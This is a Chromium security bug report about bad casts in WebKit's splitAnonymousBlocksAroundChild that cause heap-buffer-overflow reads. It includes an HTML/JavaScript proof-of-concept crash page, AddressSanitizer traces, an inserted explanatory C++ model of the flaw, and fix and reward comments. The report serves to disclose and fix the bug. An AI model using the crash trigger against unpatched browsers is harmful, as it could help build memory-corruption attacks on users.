Issue metadata

Status: Fixed
Owner:
Closed: Feb 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Bad casts due to issues in splitAnonymousBlocksAroundChild

Reported by miau...@gmail.com, Feb 9 2012

Issue description

VULNERABILITY DETAILS

READ of size 1 at 0x7fffece4b5c0 thread T0
    #0 0x55555aa7faf8 in WebCore::RenderTableSection::setNeedsCellRecalc() ???:0

I think I have 4 or 5 of these stacks. Maybe they are all the same bug.


VERSION
Chrome Version: stable, beta, dev

Chromium: 19.0.1036.0 (Developer Build 121128)
OS: Linux
WebKit: 535.20 (@107140)
JavaScript: V8 3.9.4

Operating System: 64bit linux
REPRODUCTION CASE
<html>
  <head>
    <style>
      #el1 {
        -webkit-column-count: 2;
        content: counter(c);
      }
      #el1::after {
        display: table-row;
        content: '';
      }
      #el3 {
        -webkit-column-span: all;
      }
    </style>
    <script>
      function crash(){
        el0 = document.createElement('div')
        document.body.appendChild(el0)
        el1 = document.createElement('div')
        el1.setAttribute('id', 'el1')
        el0.appendChild(el1)
        el1.appendChild(document.createElement('thead'))
        el3 = document.createElement('div')
        el3.setAttribute('id', 'el3')
        el1.appendChild(el3)
        el4 = document.createElement('q')
        el1.appendChild(el4)
        el4.style.display='table-row'
        setTimeout(function() {
          el3.style.display='table'
          document.body.focus()
          document.body.style.zoom=2
        }, 0)
      } 
      window.onload=crash
    </script>
  </head>
  <body>
  </body>
</html>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: renderer+asan
Crash State: 

READ of size 1 at 0x7fffecc2dfc0 thread T0
    #0 0x55555ae0fa42 in WebCore::RenderTableSection::setNeedsCellRecalc() ???:0
    #1 0x55555adf533a in WebCore::RenderTableCell::willBeDestroyed() ???:0
    #2 0x55555adba252 in WebCore::RenderObject::destroy() ???:0

0x7fffecc2dfc0 is located 136 bytes to the right of 184-byte region [0x7fffecc2de80,0x7fffecc2df38)
allocated by thread T0 here:
    #0 0x55555da19582 in malloc ??:0
    #1 0x55555abad9c6 in WebCore::RenderBlock::createAnonymousBlock(bool) const ???:0

Attachments: asan-renderTable136184.txt (6.3 KB), beta-asan-renderTable136184.txt (5.9 KB), renderTable136184.html (1001 bytes), stable-asan-renderTable136184.txt (5.9 KB)
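As an added illustration (not WebKit code and not from this issue's attachments), the C++ below models the class of bug reported here: a downcast whose only type check is a debug ASSERT (the `!object || object->isRenderBlock()` failure seen in debug builds), so that in release builds an anonymous RenderBlock created by splitAnonymousBlocksAroundChild is treated as a RenderTableSection and a byte beyond the smaller object is touched. The class layout is constructed so the numbers match the ASan reports above (a 184-byte block, flag 136 bytes past its end); `toRenderTableSection`, `markSectionDirty` and `flagOverrunPastRenderBlock` are hypothetical names, not WebKit's.

```cpp
#include <cstddef>

struct RenderObject {
    virtual ~RenderObject() = default;
    virtual bool isTableSection() const { return false; }
};
// Constructed layout: vptr + 176 bytes of fields = 184 bytes on LP64, the size of
// the anonymous block region in the ASan reports.
struct RenderBlock : RenderObject {
    char blockFields[176];
};
// A section is larger; the 1-byte flag setNeedsCellRecalc() touches sits 136 bytes
// past where a bare RenderBlock allocation ends.
struct RenderTableSection : RenderBlock {
    bool isTableSection() const override { return true; }
    char sectionFields[136];
    bool needsCellRecalc = false;
};
// Vulnerable pattern: the type check is a debug-only ASSERT (absent in release),
// so any RenderObject is cast blindly and the callee touches the wrong memory.
inline RenderTableSection* toRenderTableSectionUnchecked(RenderObject* o) {
    // ASSERT(!o || o->isTableSection());
    return static_cast<RenderTableSection*>(o);
}

// Hardened pattern: the check runs in every build; callers must handle null.
inline RenderTableSection* toRenderTableSection(RenderObject* o) {
    if (!o || !o->isTableSection())
        return nullptr;
    return static_cast<RenderTableSection*>(o);
}
// Stands in for setNeedsCellRecalc() being called on a cell's parent during teardown.
// Returns false when the parent is not really a section (the rejected bad cast).
bool markSectionDirty(RenderObject* parent) {
    RenderTableSection* section = toRenderTableSection(parent);
    if (!section)
        return false;  // with the unchecked cast this is a 1-byte out-of-bounds access
    section->needsCellRecalc = true;
    return true;
}

// Distance from the end of a RenderBlock allocation to the flag: the "N bytes to
// the right of the region" that ASan reports when a block is misused as a section.
std::size_t flagOverrunPastRenderBlock() {
    RenderTableSection s;
    const char* base = reinterpret_cast<const char*>(&s);
    const char* flag = reinterpret_cast<const char*>(&s.needsCellRecalc);
    return static_cast<std::size_t>(flag - base) - sizeof(RenderBlock);
}
```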

Comment 1 by miau...@gmail.com, Feb 9 2012

here's a different stack

==27297== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7fffecc2ddc0 at pc 0x55555ae10066 bp 0x7fffffff4130 sp 0x7fffffff4128
READ of size 1 at 0x7fffecc2ddc0 thread T0
    #0 0x55555ae10066 in WebCore::RenderTableSection::removeChild(WebCore::RenderObject*) ???:0
    #1 0x55555adba0bd in WebCore::RenderObject::willBeDestroyed() ???:0

0x7fffecc2ddc0 is located 136 bytes to the right of 184-byte region [0x7fffecc2dc80,0x7fffecc2dd38)
allocated by thread T0 here:
    #0 0x55555da19582 in malloc ??:0
    #1 0x55555abad9c6 in WebCore::RenderBlock::createAnonymousBlock(bool) const ???:0
    #2 0x55555abac947 in WebCore::RenderBlock::splitAnonymousBlocksAroundChild(WebCore::RenderObject*) ???:0

Attachments: 136184-three.html (873 bytes), 136184-three.txt (5.9 KB)

Comment 2 by miau...@gmail.com, Feb 9 2012

and this...

READ of size 1 at 0x7fffecc9e3c0 thread T0
    #0 0x55555ae0e804 in WebCore::RenderTableSection::willBeDestroyed() ???:0
    #1 0x55555adba252 in WebCore::RenderObject::destroy() ???:0

0x7fffecc9e3c0 is located 136 bytes to the right of 184-byte region [0x7fffecc9e280,0x7fffecc9e338)
allocated by thread T0 here:
    #0 0x55555da19582 in malloc ??:0
    #1 0x55555abad9c6 in WebCore::RenderBlock::createAnonymousBlock(bool) const ???:0
    #2 0x55555abac947 in WebCore::RenderBlock::splitAnonymousBlocksAroundChild(WebCore::RenderObject*) ???:0
Attachments: 136184four.txt (5.2 KB), 136184four.html (847 bytes)

Comment 3 by miau...@gmail.com, Feb 9 2012

this is the last one:

==4573== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7fffecc9dbc0 at pc 0x55555adf72ff bp 0x7fffffff9630 sp 0x7fffffff9628
READ of size 1 at 0x7fffecc9dbc0 thread T0
    #0 0x55555adf72ff in WebCore::RenderTableCell::clippedOverflowRectForRepaint(WebCore::RenderBoxModelObject*) const ???:0
    #1 0x55555adaf90b in WebCore::RenderObject::repaint(bool) ???:0


0x7fffecc9dbc0 is located 136 bytes to the right of 184-byte region [0x7fffecc9da80,0x7fffecc9db38)
allocated by thread T0 here:
    #0 0x55555da19582 in malloc ??:0
    #1 0x55555abac553 in WebCore::RenderBlock::createAnonymousColumnsBlock() const ???:0
    #2 0x55555abaea68 in WebCore::RenderBlock::splitFlow(WebCore::RenderObject*, WebCore::RenderBlock*, WebCore::RenderObject*, 
Attachments: 136184five.txt (7.1 KB), 136184five.html (923 bytes)

Labels: Mstone-18 SecSeverity-High SecImpacts-Stable SecImpacts-Beta
18.0.1025.7/linux/debug, 17.0.963.51/linux/debug hit this assert:

ASSERTION FAILED: !object || object->isRenderBlock()
third_party/WebKit/Source/WebCore/rendering/RenderBlock.h(1087) : WebCore::RenderBlock* WebCore::toRenderBlock(WebCore::RenderObject*)
Issue 113431 has been merged into this issue.
Labels: -Area-Undefined Area-WebKit
Status: Available
Upstreamed as https://bugs.webkit.org/show_bug.cgi?id=78269
Just FYI, the c#3 test case is different from the rest and is a dup of 113431. It is being fixed by bug 113258.
Issue 113908 has been merged into this issue.
Summary: Bad casts due to issues in splitAnonymousBlocksAroundChild
Labels: -Pri-0 -Mstone-18 Pri-1 Mstone-17 Stability-AddressSanitizer OS-All
SecImpacts Stable is m17
Cc: adamk@chromium.org
Cc: jchaffraix@chromium.org
Owner: infe...@chromium.org
Status: Started
Looking.

Comment 13 by kenrb@chromium.org, Feb 17 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/108127
DON'T merge this until http://code.google.com/p/chromium/issues/detail?id=115003 is fixed. Check out c#18 and c#19 in https://bugs.webkit.org/show_bug.cgi?id=79043.

Comment 15 by kenrb@chromium.org, Feb 22 2012

Labels: -Merge-Approved
Status: Assigned
Labels: Merge-Approved
Status: FixUnreleased
Make sure to merge http://trac.webkit.org/changeset/108606 along with http://trac.webkit.org/changeset/108127. It prevents regressions in run-in crashes in 115003 and fixes their renderings, which is more important to prevent future bugs. Traditionally, run-ins and list-items have been pretty naughty about causing security problems.
Confirming that r108606 fixes the run-in issues and all crashes - https://cluster-fuzz.appspot.com/?search=122724:122726#testcases
Labels: -reward-topanel reward-1000 reward-unpaid
$1000 per bad cast issue -- we decided these do indeed constitute multiple issues so brace for more rewards :D

$1000

----
Boilerplate text:
Please do NOT publicly disclose details until a fix has been released to all our
users. Early public disclosure may cancel the provisional reward.
Also, please be considerate about disclosure when the bug affects a core library
that may be used by other products.
Please do NOT share this information with third parties who are not directly
involved in fixing the bug. Doing so may cancel the provisional reward.
Please be honest if you have already disclosed anything publicly or to third parties.
----
Labels: CVE-2011-3037
Labels: -reward-unpaid

Comment 23 by cdn@chromium.org, May 15 2012

Status: Fixed
Marking old security bugs Fixed.

Comment 24 by bugdroid1@chromium.org (Project Member), Oct 13 2012

Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Comment 25 by bugdroid1@chromium.org (Project Member), Mar 10 2013

Labels: -Type-Security -Area-WebKit -Mstone-17 -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer Cr-Content Security-Impact-Stable Security-Severity-High Security-Impact-Beta Type-Bug-Security M-17 Performance-Memory-AddressSanitizer
Comment 26 by bugdroid1@chromium.org (Project Member), Mar 13 2013

Labels: Restrict-View-EditIssue
Comment 27 by bugdroid1@chromium.org (Project Member), Mar 13 2013

Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Comment 29 by bugdroid1@chromium.org (Project Member), Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Comment 30 by bugdroid1@chromium.org (Project Member), Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Comment 31 by bugdroid1@chromium.org (Project Member), Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Comment 32 by bugdroid1@chromium.org (Project Member), Apr 1 2013

Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Comment 33 by bugdroid1@chromium.org (Project Member), Apr 6 2013

Labels: -Cr-Content Cr-Blink
Comment 34 by sheriffbot@chromium.org (Project Member), Jun 14 2016

Labels: -security_impact-beta
Comment 35 by sheriffbot@chromium.org (Project Member), Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 36 by sheriffbot@chromium.org (Project Member), Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted